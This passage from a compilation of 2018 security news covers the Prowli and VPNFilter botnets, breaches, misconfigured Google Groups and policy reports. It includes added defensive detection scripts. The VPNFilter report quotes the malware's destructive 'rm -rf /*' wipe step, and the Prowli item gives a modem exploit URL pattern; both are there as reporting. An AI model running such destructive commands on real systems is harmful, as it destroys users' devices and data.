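    for host, cmd in score(load(SAMPLE_EVENTS)):
        print(host, "->", cmd)
```

On the constructed data, `svchost.exe -k netsvcs` and `chrome.exe` drop out because they appear on several hosts, and the single surviving lead is WS01, where excel.exe spawned cmd.exe with an encoded PowerShell command; that is the line the analyst opens first, and the hunt has a defined end once every such lead is explained.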

Task Automation
Without AI and task automation it would be impossible to keep up with the ever-growing volume of threats. A human eye is still very much needed, but without automation the thousands of new threats and malware samples that surface every day would go unnoticed.

Threat hunting needs a combination of exceptionally skilled people and automation built specifically to find threats in modern security environments and sensitive networks.

Execution
That said, there is no perfect tool or perfect procedure that a threat hunter can follow to eliminate threats from a modern security environment. It is a continuous struggle between online threats that keep getting better each day and the innovation required of threat hunters to stay one step ahead of the attacks.

AI and the Future of Cyber Threat Hunting
One of the fastest-evolving tools of recent years is artificial intelligence and machine learning, which has helped threat hunters reduce the time they spend on detection, prevention and remediation, and has improved the efficiency of the measures they take.
However, some believe that as AI gets better it will remove the need for human threat hunters. We believe that will never be the case, for two reasons.

First, AI is a developing technology available to both sides, the good and the bad. Some analysts even suggest that future cyber threats will be created and propagated using AI, and even blockchain, for much wider impact.

Second, AI is a tool created by humans. Even though it is very efficient at analyzing all options at once and picking the best decision, it may never outpace the creativity and innovation of the human mind. AI can be very handy for implementation and research, but for now humans lead the show with their own creativity and critical thinking.


Prowli Operation – Crooks already compromised over 40,000 servers and IoT Devices
7.6.2018 securityaffairs IoT

Crooks have infected over 40,000 web servers, modems and other IoT devices with the Prowli malware as part of a campaign that mines cryptocurrency and redirects victims to malicious sites.
The Prowli malware was spotted by researchers at GuardiCore; the attackers built the huge botnet by exploiting known vulnerabilities and running brute-force attacks.

The campaign, dubbed Operation Prowli, targeted servers and devices using the following attack methods:

A self-propagating worm that targets systems running SSH by brute-force credential guessing; infected machines then download and run a cryptocurrency miner.
Exploiting the CVE-2018-7482 file download vulnerability to compromise Joomla! servers running the K2 extension.
Accessing the internet-facing configuration panel of a variety of DSL modems via a URL such as http://:7547/UD/act?1 and passing parameters that exploit a known vulnerability in the processing of SOAP data, which allows remote code execution. This vulnerability was previously used by the Mirai worm.
Using several exploits and launching brute-force attacks on the admin panels of WordPress sites.
Exploiting a four-year-old vulnerability, CVE-2014-2623, to execute commands with system privileges on HP Data Protector servers exposed to the internet (over port 5555).
Targeting Drupal and phpMyAdmin installations, NFS boxes and servers with exposed SMB ports via brute-force credential guessing.

Once the attackers have compromised a server or an IoT device, they determine whether they can use it for cryptocurrency mining. They deploy a Monero miner and the r2r2 worm, a piece of malware that launches SSH brute-force attacks from the hacked devices.

“The attackers behind Prowli incur no expenses when they use r2r2 to take over computers owned by others and use mining pools to launder their gains. Cryptocurrency is a common payload of modern worms, and in this case as in many others, our attackers prefer to mine Monero, a cryptocurrency focused on privacy and anonymity to a greater degree than Bitcoin.” reads the analysis published by the experts.

“Second source of revenue is traffic monetization fraud. Traffic monetizers, such as roi777, buy traffic from “website operators” such as the Prowli attackers and redirect it to domains on demand. Website “operators” earn money per traffic sent through roi777. The destination domains frequently host different scams, such as fake services, malicious browser extensions and more.”

The hackers also planted the WSO web shell on compromised servers. Hacked websites were used to host malicious code that redirects visitors to a traffic distribution system (TDS); with this scheme the crooks monetize their efforts by selling hijacked traffic.


Further details on the Prowli campaign, including IoCs are reported in the analysis published by GuardiCore.


VPNFilter malware now targets new devices, even behind a firewall
7.6.2018 securityaffairs Virus

The VPNFilter botnet is now targeting new devices from other vendors, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE.
The VPNFilter botnet is worse than initially thought. According to a new report published by Cisco's Talos Intelligence group, the malicious code now targets ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE devices.

“First, we have determined that additional devices are being targeted by this actor, including some from vendors that are new to the target list. These new vendors are ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.” reads a new analysis published by Talos team.

“New devices were also discovered from Linksys, MikroTik, Netgear, and TP-Link. Our research currently shows that no Cisco network devices are affected.”

The VPNFilter bot can now target endpoints behind the firewall and other network devices thanks to a new stage 3 module that injects malicious content into web traffic.

The recently discovered module, dubbed "ssler", can be used to deliver exploits to endpoints via a man-in-the-middle capability: the attackers intercept network traffic and inject malicious code into it without the user's knowledge.

“The ssler module, which we pronounce as “Esler,” provides data exfiltration and JavaScript injection capabilities by intercepting all traffic passing through the device destined for port 80. This module is expected to be executed with a parameter list, which determines the module’s behavior and which websites should be targeted.” continues the analysis.

VPNFilter initially infected over 500,000 routers and NAS devices, most of them in Ukraine, but prompt action by the authorities made it possible to take the botnet down.

A week ago, experts from security firms GreyNoise Intelligence and JASK reported that the threat actor behind VPNFilter is attempting to rebuild the botnet with a new wave of infections.

Talos researchers confirmed that more devices from Linksys, MikroTik, Netgear, and TP-Link are affected, which means the botnet could rapidly grow by infecting new consumer and SOHO devices.

Talos has already notified the vendors of the attacks, and most of them promptly started working on new firmware to address the issue.

According to experts at Juniper Networks, the VPNFilter bot doesn’t exploit a zero-day vulnerability.

“The initial list of targeted routers included MikroTik, Linksys, NetGear, and TP-Link. It is now expanded to include devices from ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE,” reads a post published by Juniper Networks.

“We still do not believe this list is complete as more infected devices are being discovered. There is still no sign of any zero-day vulnerability being exploited, so it is likely that known vulnerabilities and weak passwords are the main vector of infection.”

The new attacks observed by Talos leverage compromised SOHO routers to inject content into web traffic using the ssler module.

The experts noticed that one of the parameters provided to the module is the source IP, which suggests the attackers might be profiling endpoints to pick out the best targets. The module can also monitor the destination IP, likely to choose profitable targets such as connections to a bank, or connections over which credentials and other sensitive data are in transit.
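A router that rewrites port-80 traffic, as ssler is described as doing, cannot alter the same page when it is fetched over TLS. The following script, added here as an illustration and not taken from the Talos report or from the article, uses that asymmetry as a detection check: it extracts the script elements from a reference copy of a page (assumed to have been retrieved over HTTPS from outside the suspect network) and from the copy observed over plaintext HTTP behind the router, and reports any scripts that appear only in the observed copy. The two page bodies and the 198.51.100.7 address are constructed samples.

```python
"""Spot JavaScript injected into plaintext HTTP responses by a network MITM.

Added example (not code from Talos or the article). The reference copy is
assumed to come from an HTTPS fetch outside the suspect network; the observed
copy is what a client behind the router received over HTTP.
"""
import hashlib
from html.parser import HTMLParser


class ScriptCollector(HTMLParser):
    """Collect external script URLs and SHA-256 digests of inline scripts."""

    def __init__(self):
        super().__init__()
        self.scripts = set()
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.scripts.add("src:" + src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            body = "".join(self._buf).strip().encode()
            self.scripts.add("inline:" + hashlib.sha256(body).hexdigest()[:16])
            self._in_inline = False


def script_set(html):
    """Return the set of script identifiers found in an HTML document."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def injected_scripts(reference_html, observed_html):
    """Scripts present in the observed (HTTP) copy but absent from the
    reference (HTTPS) copy; a non-empty result means something on the path
    rewrote the page."""
    return sorted(script_set(observed_html) - script_set(reference_html))


# Constructed sample: the same page as served over TLS and as seen on the LAN.
REFERENCE_PAGE = """<html><head><script src="/static/app.js"></script></head>
<body><script>init();</script></body></html>"""

OBSERVED_PAGE = """<html><head><script src="/static/app.js"></script>
<script src="http://198.51.100.7/s.js"></script></head>
<body><script>init();</script><script>window.__x = 1;</script></body></html>"""

if __name__ == "__main__":
    for item in injected_scripts(REFERENCE_PAGE, OBSERVED_PAGE):
        print("injected:", item)
```

Inline scripts are compared by digest rather than by text so that a legitimately dynamic page (a nonce or timestamp in the script) shows up as one changed entry instead of a wall of diff; an external URL pointing at a bare IP address, as in the sample, is the kind of entry worth escalating.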

The experts also provided further details on the device destruction module, ‘dstr’, which attackers could use to render an infected device inoperable.

The dstr module deletes files necessary for normal operation of the infected device; it also deletes all files and folders related to its own operation to hide its presence from forensic analysis.

“The dstr module clears flash memory by overwriting the bytes of all available /dev/mtdX devices with a 0xFF byte. Finally, the shell command rm -rf /* is executed to delete the remainder of the file system and the device is rebooted. At this point, the device will not have any of the files it needs to operate and fail to boot,” the analysis continues.

The following table, published by El Reg, lists all devices targeted by the VPNFilter bot; newly added models are marked with an asterisk.

VENDOR     DEVICE / SERIES
ASUS       RT-AC66U*; RT-N10 series*; RT-N56 series*
D-Link     DES-1210-08P*; DIR-300 series*; DSR-250, 500, and 1000 series*
Huawei     HG8245*
Linksys    E1200; E1500; E3000*; E3200*; E4200*; RV082*; WRVS4400N
MikroTik   CCR1009*; CCR1x series; CRS series*; RB series*; STX5*
Netgear    DG834*; DGN series*; FVS318N*; MBRN3000*; R-series; WNR series*; WND series*; UTM50*
QNAP       TS251; TS439 Pro; other devices running QTS software
TP-Link    R600VPN; TL-WR series*
Ubiquiti   NSM2*; PBE M5*
UPVEL      Unknown devices
ZTE        ZXHN H108N*

Further technical details are available in the report published by Talos.


HR Software Firm PageUp Suffers Data Breach
6.6.2018 securityweek Incident

PageUp, an Australian company that provides HR software, informed customers this week that it launched an investigation on May 23 after detecting suspicious activity on its IT infrastructure.

The firm’s analysis of the incident revealed on May 28 that hackers may have gained access to names, contact information, usernames, and password hashes. Documents, such as signed employment contracts and resumes, should be safe as they are stored on different servers.

“There is no evidence that there is still an active threat, and the jobs website can continue to be used. All client user and candidate passwords in our database are hashed using bcrypt and salted, however, out of an abundance of caution, we suggest users change their password,” said Karen Cariss, CEO and co-founder of PageUp.

While the company has only shared limited technical information regarding the incident, it did say that the attack involved a piece of malware. The breach has been investigated by both law enforcement and cybersecurity experts. Cybersecurity organizations and data regulators in Australia and the United Kingdom have been notified.

PageUp says it has 2.6 million active users across over 190 countries. Some of the company’s customers have notified job applicants and shut down their online recruitment pages following the incident.

Australia Post, which has been using PageUp since October 2016, highlighted that in the case of individuals whose applications were successful, bank details, tax file numbers and other sensitive information was also stored on PageUp servers. There is no evidence, however, that this data has been accessed by hackers, Australia Post said.

Wesfarmers-owned supermarket chain Coles has shut down its careers website and issued a statement saying it has suspended all connections between its systems and PageUp while an investigation is conducted. Other Wesfarmers retailers, including Kmart, Target and Officeworks, have also shut down their careers websites.

Australian telecoms giant Telstra has also suspended its online recruitment system due to the breach at PageUp. The company warned successful applicants that their date of birth, employment offer details, and pre-employment check outcomes were stored on PageUp systems.

The incident also impacts logistics and supply chain company Linfox and private health insurer Medibank, both of which have suspended their careers pages.

Several universities in the United States also use PageUp. However, at the time of writing, none of the U.S. universities listed on PageUp’s testimonials page have issued security alerts or suspended their online recruitment systems.


Thousands of Organizations Expose Sensitive Data via Google Groups
6.6.2018 securityweek Incident

Google has issued a warning to G Suite users after researchers discovered that thousands of organizations expose sensitive information through misconfigured Google Groups instances.

The Google Groups service allows users to create mailing lists, host internal discussions, and process support tickets. These types of communications can include highly sensitive information, which is why it’s important for companies to ensure that privacy and security settings are configured properly.

When a group is configured, its creator has to set sharing options for “Outside this domain - access to groups” to either “Private” or “Public on the Internet.” While the default option is “Private,” many organizations have set it to “Public on the Internet,” in many cases likely not realizing that anyone can access the group.
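The setting described above is the one an administrator would audit across every group in the domain rather than checking groups one at a time in the UI. The script below is an added illustration, not code from Kenna Security or Google: it takes group settings records in the shape returned by the Google Groups Settings API (the field name `whoCanViewGroup` and the values `ANYONE_CAN_VIEW`, `ALL_IN_DOMAIN_CAN_VIEW` and `ALL_MEMBERS_CAN_VIEW` are assumed here to be the API's equivalents of the “Public on the Internet” and “Private” choices), flags groups readable by anyone on the Internet, and produces a hardened copy of each record. The records are constructed samples.

```python
"""Audit Google Groups visibility settings for public exposure.

Added example, not from the research or from Google. The field name and
enum values are assumed to match the Groups Settings API resource; the
group records below are constructed samples.
"""

PUBLIC_VIEW = "ANYONE_CAN_VIEW"                  # "Public on the Internet"
EXPECTED_VIEWS = {                               # non-public choices
    "ALL_IN_DOMAIN_CAN_VIEW",
    "ALL_MEMBERS_CAN_VIEW",
    "ALL_MANAGERS_CAN_VIEW",
    "ALL_OWNERS_CAN_VIEW",
}


def audit_groups(settings):
    """Return a finding for every group whose conversations are readable
    from the open Internet, plus a review item for any value we do not
    recognise (including a missing field)."""
    findings = []
    for group in settings:
        view = group.get("whoCanViewGroup")
        if view == PUBLIC_VIEW:
            findings.append({
                "group": group["email"],
                "severity": "high",
                "issue": "conversations readable by anyone on the Internet",
            })
        elif view not in EXPECTED_VIEWS:
            findings.append({
                "group": group["email"],
                "severity": "review",
                "issue": f"unexpected whoCanViewGroup value {view!r}",
            })
    return findings


def harden(group):
    """Return a copy of the record with public viewing replaced by the
    members-only setting; anything else is left for a human to decide."""
    fixed = dict(group)
    if fixed.get("whoCanViewGroup") == PUBLIC_VIEW:
        fixed["whoCanViewGroup"] = "ALL_MEMBERS_CAN_VIEW"
    return fixed


# Constructed sample records, not real groups.
SAMPLE_SETTINGS = [
    {"email": "support@example.com", "whoCanViewGroup": "ANYONE_CAN_VIEW"},
    {"email": "eng-discuss@example.com", "whoCanViewGroup": "ALL_IN_DOMAIN_CAN_VIEW"},
    {"email": "finance-private@example.com", "whoCanViewGroup": "ALL_MEMBERS_CAN_VIEW"},
    {"email": "legacy@example.com"},             # field missing: needs manual review
]

if __name__ == "__main__":
    for finding in audit_groups(SAMPLE_SETTINGS):
        print(finding)
```

A support or ticketing group is exactly the case the article warns about: it is often made public so that outsiders can write to it, and the viewing setting gets widened at the same time even though only posting needed to be.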

Researchers at Kenna Security have conducted an analysis of roughly 2.5 million domains and identified more than 9,600 organizations that had allowed public access to their groups. After taking a closer look at a random sample of 171 groups, the company estimated that nearly 3,000 of the over 9,600 companies leaked some type of sensitive information.

The impacted organizations include Fortune 500 companies, universities, hospitals, media firms, financial institutions, and even government agencies.

The exposed information includes financial data, passwords, and documents containing confidential information.

“Given the sensitive nature of this information, possible implications include spear-phishing, account takeover, and a wide variety of case-specific fraud and abuse,” Kenna Security said in a blog post.

The company notified some of the organizations leaking highly sensitive data and pointed out that the “views” counter was in the vast majority of cases at zero, which indicates that no one had yet seen the information.

Kenna has also notified Google, but since this is not an actual vulnerability, the issue cannot be addressed with a patch. The tech giant did say, however, that it’s always reviewing its products to “help users make decisions that are appropriate for their organizations.”

Google has also published a post on its G Suite blog, providing advice on how users can configure their Google Groups settings to better protect their data.

This is not the first time researchers have warned about the risks associated with misconfigured Google Groups instances. Last year, cloud security firm RedLock warned that hundreds of organizations were likely exposing sensitive data through Google Groups. At the time, the company found names, email and home addresses, employee salary data, sales pipeline data, and customer passwords in the exposed groups.


VPNFilter Continues Targeting Routers in Ukraine
6.6.2018 securityweek
Virus

Despite their infrastructure being disrupted, the hackers behind the VPNFilter botnet continue targeting routers located in Ukraine, which is believed to be the campaign’s primary target.

When Cisco Talos brought the existence of VPNFilter to light last month, the botnet had ensnared at least 500,000 routers and network-attached storage (NAS) devices across 54 countries.

The malware can intercept data passing through the compromised device, it can monitor the network for communications over the Modbus SCADA protocol, and also has destructive capabilities that can be leveraged to make an infected device unusable.

During the first stage of the infection process, once it completed initialization, the malware attempted to obtain an IP address from images hosted on the Photobucket service. If that failed, it would try to acquire the IP from an image hosted on a backup domain, toknowall.com. That IP pointed to a server hosting the stage 2 payload.

Photobucket has closed the accounts used in the attack and the FBI has managed to take control of the toknowall.com domain, thus disrupting the operation.

However, VPNFilter is designed to open a listener and wait for a specific trigger packet if the backup domain fails as well. This allows the attacker to still provide the IP for the stage 2 component.

While it’s unclear exactly what else the FBI and cybersecurity firms did to disrupt the botnet, researchers at Jask and GreyNoise Intelligence noticed that VPNFilter has continued to target routers even after Talos published its report and the toknowall.com domain was seized.

Experts have observed some IPs scanning port 2000 for vulnerable MikroTik routers located exclusively in Ukraine. The source IPs have been traced to countries such as Russia, Brazil, the United States, and Switzerland.
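Scanning of this kind is visible to defenders as a single source touching the same port on many addresses in a short window. The detector below is an added illustration, not code from Jask or GreyNoise: it parses firewall-style deny records, counts the distinct destinations each source hit on TCP/2000, and reports the sources that exceed a threshold. The log format, the threshold and all the addresses are constructed for the example.

```python
"""Flag sources probing one port across many hosts (here TCP/2000).

Added example, not from the research cited in the article. The log line
format and the sample records are constructed; real firewalls vary.
"""
import re
from collections import defaultdict

# Constructed log format: "<date> <time> DENY proto=<p> src=<ip>:<port> dst=<ip>:<port>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) DENY proto=(?P<proto>\w+) "
    r"src=(?P<src>[\d.]+):(?P<sport>\d+) dst=(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_line(line):
    """Return the fields of one deny record, or None if it does not match."""
    match = LOG_RE.match(line.strip())
    return match.groupdict() if match else None


def find_port_scanners(lines, port=2000, min_targets=3):
    """Map each source IP to the sorted distinct destinations it hit on
    TCP `port`, keeping only sources with at least `min_targets` of them."""
    targets = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["proto"] == "tcp" and int(rec["dport"]) == port:
            targets[rec["src"]].add(rec["dst"])
    return {src: sorted(dsts) for src, dsts in targets.items()
            if len(dsts) >= min_targets}


# Constructed sample log: one sweep of port 2000, one benign single hit,
# one unrelated port and one UDP record that must not count.
SAMPLE_LOG = """\
2018-06-05 10:01:02 DENY proto=tcp src=203.0.113.9:41022 dst=192.0.2.10:2000
2018-06-05 10:01:02 DENY proto=tcp src=203.0.113.9:41023 dst=192.0.2.11:2000
2018-06-05 10:01:03 DENY proto=tcp src=203.0.113.9:41024 dst=192.0.2.12:2000
2018-06-05 10:01:03 DENY proto=tcp src=203.0.113.9:41025 dst=192.0.2.13:2000
2018-06-05 10:01:05 DENY proto=tcp src=198.51.100.4:55000 dst=192.0.2.10:2000
2018-06-05 10:01:06 DENY proto=tcp src=198.51.100.4:55001 dst=192.0.2.10:443
2018-06-05 10:01:07 DENY proto=udp src=203.0.113.77:5000 dst=192.0.2.14:2000
""".splitlines()

if __name__ == "__main__":
    for src, dsts in find_port_scanners(SAMPLE_LOG).items():
        print(f"{src} probed TCP/2000 on {len(dsts)} hosts: {', '.join(dsts)}")
```

The threshold is the only tuning knob: a single hit on port 2000 from an unknown address is noise, a sweep across an address block is the behaviour the researchers describe, and the window over which the count is taken should match how fast the log source delivers records.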

“Activity like this raises some interesting questions about indications of ongoing Ukraine targeted campaigns, a likely subject for future research,” Jask wrote in a blog post.

The VPNFilter attack was allegedly launched by Russia – specifically the group known as Sofacy, APT28, Pawn Storm, Fancy Bear, and Sednit – and the main target is believed to be Ukraine. Some links have also been found between the VPNFilter malware and BlackEnergy, which has been used by a different Russia-linked threat actor known as Sandworm. The FBI has viewed Sofacy and Sandworm as the same group when it attributed VPNFilter to Russia.

The VPNFilter malware has been observed targeting devices from Linksys, MikroTik, Netgear, TP-Link and QNAP. All of these vendors have published advisories to warn their customers about the threat.

The FBI has advised users to reboot their routers to temporarily disrupt the malware. While rebooting a router is typically enough to remove a piece of malware, VPNFilter has a clever persistence mechanism that helps its stage 1 component survive a reboot of the device.


Microsoft to Acquire GitHub for $7.5 Billion
6.6.2018 securityweek IT

Microsoft on Monday announced that it has agreed to acquire software development and collaboration platform GitHub in a deal valued at $7.5 billion.

Under the terms of the agreement, Microsoft will acquire GitHub for $7.5 billion in Microsoft stock. The deal is expected to close by the end of 2018, subject to customary closing conditions and regulatory review.

GitHub is a cloud-based repository for source code, offering hosting, version control management and code collaboration capabilities. It is thought to have 27 million developers using its services in nearly every country in the world, and to host 80 million code repositories. Microsoft is already a major user of GitHub, reportedly with more than 1,000 employees pushing code to GitHub repositories.

GitHub was valued at $2 billion at its most recent funding round in 2015.

The acquisition makes sense for Microsoft given its increasing involvement with Linux and open source projects. There is, however, concern among many of the independent developers using the service, who point to a perceived decline in the performance of both LinkedIn and Skype following their earlier acquisition by Microsoft.

"LinkedIn has turned into a slow-loading junk after the Microsoft acquisition. I can only imagine what awaits GitHub," tweeted Catalin Cimpanu.

A further concern is that ownership could give Microsoft access to the source of potentially competitive or disruptive projects. "This is not all about Microsoft," was another tweet. "This is about the independence of what has become the de-facto home of open source. It shouldn't be owned by any company that has any agenda other than host that home."

Robert Graham of Errata Security has a different concern. GitHub has a history of national censorship attempts -- a DDoS out of Russia in 2014; blocked in India in 2014; a DDoS apparently out of China in 2015; and blocked in Turkey in 2016. On February 28, 2018, GitHub was hit by a world record DDoS peaking at 1.35 Tbps.

His concern now is that China would be able to censor GitHub via Microsoft. It cannot currently censor individual pages (such as those about the Tiananmen Square massacre in 1989) because GitHub forces the use of SSL/TLS, so the China Firewall cannot see which pages are being accessed. "The only option," he tweeted, "would be to block the entire site, all access to http://GitHub.com, but China can't do that either, because so much source code is hosted on GitHub -- source code their industry needs in order to build products."

As an independent organization he believes that GitHub is too important to be blocked by the Chinese government. "When Microsoft buys GitHub, however, China will now have leverage, threatening other Microsoft interests in China in order to pressure Microsoft into censoring some GitHub pages."

In the meantime, with few details of the terms and conditions, users' reactions have been largely emotional. There was widespread concern that Microsoft's motive in buying LinkedIn was to gain access to the personal details of the world's business management. There is similar concern now that Microsoft is seeking to gain some form of control over the world's open source software.

This is unlikely. SecurityWeek spoke to Robin Wood (aka DigiNinja), an independent penetration tester who uses GitHub to host the tools he develops for his trade. Assuming the purchase is finalized, "I think the important thing to look at is the exact details of the terms and conditions and any changes they decide to make to it," he told SecurityWeek. "There may be clauses in there about ownership or use without license that currently don't mean much but could mean a lot with the change of ownership."

For the moment, he is not worried by the takeover. "There are a number of established alternatives, so they can't do much to mess up actual usage otherwise people will just move away. So probably no real change for most users of the service but some with tools that Microsoft are interested in may be hit."

For himself and his own repositories, "I won't be moving my tools unless there are any specific negative changes that affect me, but I reckon there will be a bunch of people jumping ship early just in case, and another bunch fear-mongering about all the nasty stuff that might happen, most of it just guess work."

Microsoft Corporate Vice President Nat Friedman, founder of Xamarin and an open source veteran, will assume the role of GitHub CEO. GitHub’s current CEO, Chris Wanstrath, will become a Microsoft technical fellow, reporting to Executive Vice President Scott Guthrie, to work on strategic software initiatives, Microsoft said.


Google Password Protects Pixel 2 Firmware
6.6.2018 securityweek Safety

Google has made the firmware of Pixel 2 devices resistant to unauthorized attempts to upgrade it by password protecting it.

Specifically, anyone interested in upgrading the firmware of a Pixel 2 device needs to supply the user password to successfully complete the process and still have access to user data.

Google has been demanding full-disk encryption for new Android devices since 2015, and the newly implemented protection is meant to complement that security feature. Google Pixel devices also encrypt all user data, and keep the encryption key protected in secure hardware.

“The secure hardware runs highly secure firmware that is responsible for checking the user's password. If the password is entered incorrectly, the firmware refuses to decrypt the device. This firmware also limits the rate at which passwords can be checked, making it harder for attackers to use a brute force attack,” Google explains in a blog post.

Google also applies digital signatures to prevent attackers from replacing a device’s firmware with a malicious version. To replace the firmware, an attacker would have to find and exploit a vulnerability in the signature-checking process, or gain access to the signing key and sign their own firmware so the device accepts it.

While the signature-checking software is small, isolated, and vetted, which makes exploitation difficult, the signing keys remain reachable by people: they are stored in secure locations, but a limited number of employees have access to them.

“That's good, but it leaves those people open to attack by coercion or social engineering. That's risky for the employees personally, and we believe it creates too much risk for user data,” Google notes.

Google Pixel 2 devices, the Internet giant says, have insider attack resistance in the tamper-resistant hardware security module to protect the encryption keys. Thus, if an attacker does come up with a properly signed malicious firmware, they cannot install it on the security module without the user's cooperation.

Specifically, the correct password is required to upgrade the firmware. While upgrades can be forced, the company says, the process would wipe the secrets used to decrypt the user's data, effectively destroying it.
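The policy the article describes combines three checks: a firmware image must carry a valid signature, the user's password must be presented before the running secrets are carried over, and password guesses are throttled. The model below is an added illustration, not Google's code or the Pixel 2's actual firmware: HMAC-SHA256 under a constructed key stands in for the vendor's signing scheme, scrypt stands in for the module's password check, and `MAX_ATTEMPTS` is an assumed lockout threshold in place of the real rate limiting. The point it demonstrates is the one Google makes: a properly signed but unauthorised image can still be forced in, but only at the cost of the key that decrypts the user's data.

```python
"""Model of an insider-attack-resistant firmware update gate.

Added example, not Google's implementation. Signing (HMAC under a
constructed key), password hashing (scrypt) and the lockout counter are
stand-ins for the real mechanisms; the property modelled is that a signed
update without the user's password can only proceed by wiping the data key.
"""
import hashlib
import hmac
import os

SIGNING_KEY = b"constructed-vendor-signing-key"   # stands in for the vendor's key
MAX_ATTEMPTS = 5                                  # assumed lockout threshold


def sign_firmware(image, key=SIGNING_KEY):
    """Vendor-side signing; a real device would verify an asymmetric signature."""
    return hmac.new(key, image, hashlib.sha256).digest()


def _kdf(password, salt):
    return hashlib.scrypt(password.encode(), salt=salt, n=2 ** 12, r=8, p=1)


class SecureModule:
    """The tamper-resistant module: holds the data key and gates updates."""

    def __init__(self, password):
        self.salt = os.urandom(16)
        self.password_hash = _kdf(password, self.salt)
        self.data_key = os.urandom(32)     # secret needed to decrypt user data
        self.firmware = b"v1"
        self.failed_attempts = 0

    def _check_password(self, password):
        # Rate limiting modelled as a hard lockout; real firmware applies delays.
        if self.failed_attempts >= MAX_ATTEMPTS:
            return False
        ok = hmac.compare_digest(self.password_hash, _kdf(password, self.salt))
        self.failed_attempts = 0 if ok else self.failed_attempts + 1
        return ok

    def update(self, image, signature, password=None, force=False):
        """Return 'rejected', 'updated' or 'updated-wiped'."""
        if not hmac.compare_digest(sign_firmware(image), signature):
            return "rejected"             # unsigned or tampered image never runs
        if password is not None and self._check_password(password):
            self.firmware = image
            return "updated"              # authorised by the user: data key survives
        if force:
            self.data_key = None          # forced by an insider: user data is gone
            self.firmware = image
            return "updated-wiped"
        return "rejected"


def lockout_demo():
    """After MAX_ATTEMPTS wrong guesses even the right password is refused."""
    module = SecureModule("pw")
    image, sig = b"v2", sign_firmware(b"v2")
    for _ in range(MAX_ATTEMPTS):
        module.update(image, sig, password="bad")
    return module.update(image, sig, password="pw")


def walkthrough():
    """Run the gate through the cases the article describes."""
    module = SecureModule("correct horse")
    image, sig = b"v2", sign_firmware(b"v2")
    results = {
        "bad_signature": module.update(image, b"\x00" * 32),
        "no_password": module.update(image, sig),
        "wrong_password": module.update(image, sig, password="wrong"),
        "user_password": module.update(image, sig, password="correct horse"),
        "data_key_kept": module.data_key is not None,
    }
    forced = SecureModule("pw")
    results["forced"] = forced.update(image, sig, force=True)
    results["data_key_after_force"] = forced.data_key is not None
    results["after_lockout"] = lockout_demo()
    return results


if __name__ == "__main__":
    for case, outcome in walkthrough().items():
        print(f"{case}: {outcome}")
```

The ordering inside `update` is what carries the security property: the signature is checked first so that nothing unsigned is ever considered, the password path is tried before the forced path so that a cooperating user never loses data, and the forced path destroys `data_key` before it installs the image rather than after.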

“The Android security team believes that insider attack resistance is an important element of a complete strategy for protecting user data. The Google Pixel 2 demonstrated that it's possible to protect users even against the most highly-privileged insiders. We recommend that all mobile device makers do the same,” Google notes.


Cyber Range Developer Cyberbit Raises $30 Million
6.6.2018 securityweek IT

Israel-based Cyberbit Ltd., a provider of cyber range training and simulation platforms, announced on Monday that it has received a $30 million investment from Claridge Israel.

Cyberbit offers a cyber range for simulated cyber training, and a detection and response platform to help protect an organization’s attack surface across IT, OT and IoT networks.

Founded in 2015, Cyberbit is a subsidiary of Elbit Systems and has offices in Israel, the United States, Europe, and Asia.

With the funding, Cyberbit says it will expand sales and marketing, primarily in North America, boost product development, and enhance customer and partner support.

“Cyberbit’s growth in just three years has been remarkable,” said Rami Hadar, Managing Director at Claridge Israel. “This growth is driven by a unique product portfolio that addresses several of the most pressing industry problems, a solid go-to-market strategy and a highly capable team that is executing successfully and creating a leadership position in several markets.”


Federal Agencies Respond to 2017 Cybersecurity Executive Order
6.6.2018 securityweek BigBrothers

The U.S. Department of State, the Department of Homeland Security (DHS), the Department of Commerce, and the Office of Management and Budget (OMB) last week published reports in response to the cybersecurity executive order signed by President Donald Trump last year in an effort to improve the protection of federal networks and critical infrastructure against cyberattacks.

Department of State on deterring adversaries

The Department of State has published two reports with recommendations to President Trump on reducing the risk of cyber conflict, deterring malicious actors, maintaining an open and interoperable Internet, and protecting the country’s cyber interests through international cooperation.

The State Department believes the United States can deter both state and non-state actors using two approaches: improving the security of its networks, and through “cost imposition.”

The goal is to prevent cyberattacks that can be classified as a use of force, and to achieve a long-lasting reduction of less serious destructive and disruptive activities that fall below the use-of-force threshold.

“The President already has a wide variety of cyber and non-cyber options for deterring and responding to cyber activities that constitute a use of force. Credibly demonstrating that the United States is capable of imposing significant costs on those who carry out such activities is indispensable to maintaining and strengthening deterrence,” the State Department’s report reads.

It adds, “With respect to activities below the threshold of the use of force, the United States should, working with like minded partners when possible, adopt an approach of imposing swift, costly, and transparent consequences on foreign governments responsible for significant malicious cyber activities aimed at harming U.S. national interests.”

Criminal charges, prosecutions and sanctions can be an effective deterrent, but the government should make it clear to potential adversaries that they would face consequences if they engage in malicious cyber activities. However, these types of actions may not deter some threat actors, such as terrorists, in which case the solution is to increase the operational cost and complexity for the adversary to achieve its goal, the State Department said.

OMB report on cybersecurity risk determination

The Executive Office of the President through the OMB has published a Federal Cybersecurity Risk Determination Report and Action Plan, which assesses cybersecurity risk management capabilities across federal agencies and provides recommendations on addressing gaps.

An analysis of 96 civilian agencies showed that 71 of them had been assigned an “At Risk” or “High Risk” rating for their ability to identify, detect and respond to cyber incidents and recover from them.

“OMB and DHS also found that agencies are not equipped to determine how malicious actors seek to gain access to their information systems and data. This overall lack of timely threat information means agencies are spending billions of dollars on security capabilities without fully understanding the dangers they’re facing in the digital wild. This situation creates enterprise-wide gaps in network visibility, IT tool and capability standardization, and common operating procedures, all of which negatively impact Federal cybersecurity,” the OMB said in its report.

The OMB and DHS have detailed the actions required to address cybersecurity risks and say they have already started implementing them.

Department of Commerce and DHS on enhancing resilience against botnets

The Department of Commerce and DHS have published a report on enhancing the resilience of the Internet against botnets and other automated threats.

